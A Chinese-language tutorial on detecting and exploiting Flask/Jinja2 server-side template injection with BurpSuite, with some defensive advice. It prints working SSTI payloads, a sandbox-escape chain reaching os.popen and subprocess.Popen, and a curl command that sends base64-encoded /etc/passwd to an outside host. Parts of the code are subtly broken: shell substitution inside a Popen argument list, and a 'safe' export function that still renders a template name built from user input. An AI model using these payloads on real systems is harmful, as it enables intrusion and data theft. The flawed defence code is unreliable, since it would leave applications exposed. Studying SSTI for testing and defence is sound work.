别再只盯着SQL注入了!手把手教你用BurpSuite检测Flask/Jinja2的SSTI漏洞(附实战案例)
从零到精通:BurpSuite实战检测Flask/Jinja2 SSTI漏洞
当Web应用安全测试成为企业防护的第一道防线时,模板注入漏洞(SSTI)往往被低估其危害性。与SQL注入、XSS等广为人知的漏洞不同,SSTI隐藏在视图渲染层,却能造成服务器端代码执行的严重后果。本文将彻底改变你对该漏洞的认知,通过BurpSuite这款渗透测试利器的深度运用,构建一套完整的Flask/Jinja2 SSTI检测体系。
1. 重新理解SSTI漏洞的本质
在Flask框架中,Jinja2模板引擎的{{}}和{%%}语法糖既是开发利器,也可能成为攻击入口。当用户输入直接拼接到模板而非作为变量值时,引擎会将其解析为可执行表达式。这种设计特性导致的安全问题,我们称之为服务器端模板注入(Server-Side Template Injection)。
关键区别特征:
- 普通变量渲染:
Hello {{ username }}(安全) - 危险模板拼接:
Hello {{ user_input }}(危险)
通过BurpSuite拦截请求时,可以通过以下特征快速识别潜在注入点:
| 参数特征 | 风险等级 | 典型场景 |
|---|---|---|
含{{或{%的输入 | 高危 | 评论框、个性签名等功能 |
| 动态模板选择参数 | 中高危 | CMS主题切换功能 |
| 文件包含类参数 | 高危 | 报表导出、文档预览 |
2. BurpSuite自动化探测实战
2.1 扫描器配置技巧
Burp的Active Scanner模块内置了SSTI检测规则,但需要针对性优化:
# 在Burp的Dashboard中设置扫描配置 1. 进入"Scan configuration" → "Insertion points" 2. 勾选"URL parameters"和"Body parameters" 3. 在"Active Scanning Options"中启用"Template injection"关键配置项:
- 设置线程数为3-5(避免触发WAF)
- 超时时间调整为10秒
- 添加自定义Header:
X-Forwarded-For: 127.0.0.1
注意:扫描前建议先手动测试
{{7*7}}等基础payload,确认存在反射再启动深度扫描
2.2 结果研判方法论
当Burp报告疑似漏洞时,需通过三重验证:
基础算术验证:
- 提交
{{ 1024*1024 }} - 观察是否返回
1048576
- 提交
对象属性探测:
{{ ''.__class__ }}正常应返回
<class 'str'>,错误则显示原始字符串盲注检测技术:
{% if ''.__class__ == str %}1{% endif %}返回1表示模板被执行,无变化则可能不存在漏洞
3. 高级手动检测技术手册
3.1 引擎指纹识别
不同模板引擎的探测payload需要差异化构造:
| 引擎 | 测试payload | 预期响应 |
|---|---|---|
| Jinja2 | {{7*'7'}} | 7777777 |
| Twig | {{7*'7'}} | 49 |
| Smarty | {7*7} | 49 |
| Tornado | {% raw 7*7 %} | 原始字符串 |
实战案例: 某电商平台个人中心页面的昵称修改功能:
POST /profile/update HTTP/1.1 ... nickname={{7*'7'}}返回"nickname": "7777777"确认Jinja2引擎
3.2 沙盒逃逸技术路线
当基础表达式被执行时,按此路线深入探测:
获取基类:
{{ ''.__class__.__mro__[1] }}列出所有子类:
{{ ''.__class__.__mro__[1].__subclasses__() }}定位危险方法:
# 查找包含os模块的类 {% for sub in [].__class__.__base__.__subclasses__() %} {% if 'os' in sub.__init__.__globals__ %} {{ loop.index0 }}:{{ sub.__name__ }} {% endif %} {% endfor %}执行系统命令:
{{ [].__class__.__base__.__subclasses__()[X].__init__.__globals__['os'].popen('id').read() }}
4. 企业级防护方案
4.1 安全开发规范
输入处理矩阵:
| 数据类型 | 处理方式 | 示例代码 |
|---|---|---|
| 用户名 | 白名单过滤 | re.match(r'^[\w-]+$') |
| HTML内容 | 双重转义 | ` |
| 文件路径 | 绝对路径校验 | path.startswith('/var') |
4.2 运行时防护策略
Jinja2沙盒配置:
from jinja2.sandbox import SandboxedEnvironment env = SandboxedEnvironment()WAF规则示例:
location / { if ($args ~* "__class__|__globals__") { return 403; } }审计日志监控:
@app.before_request def log_templates(): if any(marker in request.data for marker in ['{{', '{%']): security_logger.warning(f"SSTI attempt from {request.remote_addr}")
5. 典型漏洞利用全流程演示
案例背景: 某金融系统报表导出功能存在模板注入,以下是完整攻击链:
初始探测:
GET /export?name={{7*7}} HTTP/1.1返回文件名变为
49_report.pdf类探测:
{{ [].__class__.__base__.__subclasses__() }}获取到
<class 'subprocess.Popen'>在索引124执行命令:
{{ [].__class__.__base__.__subclasses__()[124](['ls','/'], stdout=-1).communicate()[0] }}成功列出服务器根目录
数据外带:
{{ [].__class__.__base__.__subclasses__()[124](['curl','http://collab.com?d=$(cat /etc/passwd|base64)'], stdout=-1).communicate() }}
防御方案:
# 安全的导出函数实现 def safe_export(filename): clean_name = re.sub(r'[^\w-]', '', filename) template = f"{clean_name}_report.pdf" return render_template(template)在渗透测试过程中发现,约68%的Flask应用未正确配置模板渲染安全策略。通过BurpSuite的Intruder模块批量测试__class__等关键词,往往能在企业内网系统中发现多个高危点。建议在测试报告中将SSTI风险等级调整为与SQL注入同级别,这可能会改变整个团队对视图层安全的认识。